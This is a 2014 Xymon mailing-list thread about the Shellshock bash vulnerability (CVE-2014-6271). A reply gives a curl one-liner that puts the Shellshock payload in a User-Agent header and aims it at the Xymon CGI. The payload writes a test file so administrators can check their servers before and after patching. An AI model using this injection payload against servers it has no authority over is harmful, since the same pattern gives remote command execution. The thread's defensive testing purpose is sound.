[Xymon] FYI: CVE-2014-6271 - bash vulnerability
Troy Adams
troy at athabascau.ca
Thu Sep 25 22:09:40 CEST 2014
Oh, yes, very terrible.
And if you want to test to see that you are vulnerable through Xymon, you can try this harmless exploit:
your_workstation$ curl -k -H 'User-Agent: () { :;}; echo vulnerable>/tmp/test-xymon-shellshock' http://your_xymon_server/xymon-cgi/svcstatus.sh
<html><head><title>Invalid request</title></head>
<body>Invalid request</body></html>
your_workstation$ ssh your_xymon_server 'cat /tmp/test-xymon-shellshock'
vulnerable
your_workstation$
...which creates a file (if you are vulnerable) in your Xymon server '/tmp/':
your_workstation$ ssh your_xymon_server 'cat /tmp/test-xymon-shellshock'
vulnerable
your_workstation$
...so then, you can verify before and after patching.
cheers,
Troy
----- Original Message -----
From: "J.C. Cleaver" <cleaver at terabithia.org>
To: xymon at xymon.com
Sent: Wednesday, September 24, 2014 11:54:35 AM GMT -07:00 US/Canada Mountain
Subject: [Xymon] FYI: CVE-2014-6271 - bash vulnerability
This is an important one to patch your systems on, if you haven't already.
The xymon CGI interface runs via shell wrappers around the actual C cgi
code (to set the environment properly), which means this would be an
avenue for attack.
Alternatively, using /bin/dash or some other shell besides bash (often
/bin/sh on Linux distros) is another work around. (This is the default on
the Terabithia RPMS for EL6.)
More info:
http://seclists.org/oss-sec/2014/q3/650
https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
https://access.redhat.com/articles/1200223
Regards,
-jc
_______________________________________________
Xymon mailing list
Xymon at xymon.com
http://lists.xymon.com/mailman/listinfo/xymon
--
This communication is intended for the use of the recipient to whom it
is addressed, and may contain confidential, personal, and or privileged
information. Please contact us immediately if you are not the intended
recipient of this communication, and do not copy, distribute, or take
action relying on it. Any communications received in error, or
subsequent reply, should be deleted or destroyed.
---
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.xymon.com/pipermail/xymon/attachments/20140925/afaeaa8c/attachment.html>
More information about the Xymon
mailing list